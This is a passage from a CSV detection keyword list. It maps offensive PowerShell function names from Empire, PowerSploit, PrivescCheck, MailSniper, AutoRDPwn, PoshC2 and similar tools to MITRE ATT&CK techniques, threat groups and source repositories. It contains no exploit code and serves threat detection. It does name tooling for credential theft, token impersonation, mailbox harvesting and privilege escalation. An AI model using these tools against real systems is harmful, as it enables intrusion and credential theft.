movement,https://github.com/Kevin-Robertson/Invoke-TheHash,1,1,N/A,10,10,1345,308,2018-12-09T15:38:36Z,2017-01-03T01:05:39Z -*Invoke-TheKatz*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-ThirdPartyDriversCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,0,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-ThreadedFunction*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,HTTP-Login.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Thunderfox*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-TmpDavFS*,offensive_tool_keyword,Invoke-TmpDavFS,Memory Backed Powershell WebDav Server - Creates a memory backed webdav server using powershell that can be mounted as a filesystem. Note: Mounting the remote filesystem on windows implies local caching of accessed files in the C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV system directory.,T1020 - T1059 - T1573 - T1210,TA0002 - TA0011 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/p3nt4/Invoke-TmpDavFS,1,0,N/A,N/A,2,132,27,2021-03-07T19:07:39Z,2018-07-01T13:21:11Z -*Invoke-TokenManipulation*,offensive_tool_keyword,AD exploitation cheat sheet,Invoke-TokenManipulation script Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Invoke-TokenManipulation*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-TokenManipulation.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Tokenvator*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-UacCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-UacCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-UdpEndpointsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-UnattendFilesCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-UnattendFilesCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-UpdateMimikatzScript.ps1*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/g4uss47/Invoke-Mimikatz,1,1,N/A,10,1,23,6,2023-03-02T22:59:52Z,2020-09-22T16:47:19Z -*Invoke-UrbanBishop*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*invoke-urlcheck -urls*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-UserCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-UserEnvCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,0,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-UserGroupsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,0,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-UserHunter -CheckAccess*,greyware_tool_keyword,powershell,Check local admin access for the current user where the targets are found,T1078.003 - T1046 - T1087.001,TA0002 - TA0007 - TA0040,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*invokeuserhunter*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-UserHunter*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-UserHunter*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-UserHunter*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*invoke-userhunter*,offensive_tool_keyword,pywerview,A partial Python rewriting of PowerSploit PowerView,T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482,TA0007 - TA0009,N/A,N/A,Reconnaissance,https://github.com/the-useless-one/pywerview,1,1,N/A,N/A,8,738,102,2023-10-02T14:57:20Z,2016-07-06T13:25:09Z -*Invoke-UserImpersonation*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-UsernameHarvestEAS*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-UsernameHarvestGmail*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-UsernameHarvestOWA*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-UserPrivilegesCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-UserPrivilegesCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-UserRestrictedSidsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,0,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-UserSessionListCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-UsersHomeFolderCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-VaultCredCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-VaultCredCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-VaultListCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-Vnc*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-Vnc.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Vnc.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1087,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-VNCServer.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-VNCViewer.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-VoiceTroll.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1073,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Vulmap*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-VulnerableADCSTemplates*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-watson*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - 